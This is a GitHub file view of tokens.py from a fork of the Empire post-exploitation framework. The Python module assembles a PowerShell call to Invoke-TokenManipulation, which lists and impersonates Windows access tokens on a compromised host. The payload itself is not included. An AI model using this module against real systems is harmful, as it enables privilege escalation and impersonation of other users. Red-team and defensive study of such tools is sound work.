forked from EmpireProject/Empire
-
-
Notifications
You must be signed in to change notification settings - Fork 585
/
Copy pathtokens.py
65 lines (58 loc) · 2.24 KB
/
tokens.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
from empire.server.common.empire import MainMenu
from empire.server.core.module_models import EmpireModule
from empire.server.core.module_service import auto_finalize, auto_get_source
class Module:
@staticmethod
@auto_get_source
@auto_finalize
def generate(
main_menu: MainMenu,
module: EmpireModule,
params: dict,
obfuscate: bool = False,
obfuscation_command: str = "",
script: str = "",
):
script_end = "Invoke-TokenManipulation"
outputf = params.get("OutputFunction", "Out-String")
if params["RevToSelf"].lower() == "true":
script_end += " -RevToSelf"
if params["WhoAmI"].lower() == "true":
script_end += " -WhoAmI"
if params["ShowAll"].lower() == "true":
script_end += " -ShowAll"
script_end += (
f" | {outputf} | "
+ '%{$_ + "`n"};"`n'
+ str(module.name.split("/")[-1])
+ ' completed!"'
)
for option, values in params.items():
if (
option.lower()
not in ["agent", "outputfunction", "revtoself", "whoami", "showall"]
and values
and values.lower() != "false"
):
if values.lower() == "true":
script_end += " -" + str(option)
else:
script_end += " -" + str(option) + " " + str(values)
if script.endswith("Invoke-TokenManipulation") or script.endswith("-ShowAll"):
script_end += "| Select-Object Domain, Username, ProcessId, IsElevated, TokenType | ft -autosize"
script_end += (
f" | {outputf} | "
+ '%{$_ + "`n"};"`n'
+ str(module.name.split("/")[-1])
+ ' completed!"'
)
else:
script_end += (
f" | {outputf} | "
+ '%{$_ + "`n"};"`n'
+ str(module.name.split("/")[-1])
+ ' completed!"'
)
if params["RevToSelf"].lower() != "true":
script_end += ';"`nUse credentials/tokens with RevToSelf option to revert token privileges"'
return script, script_end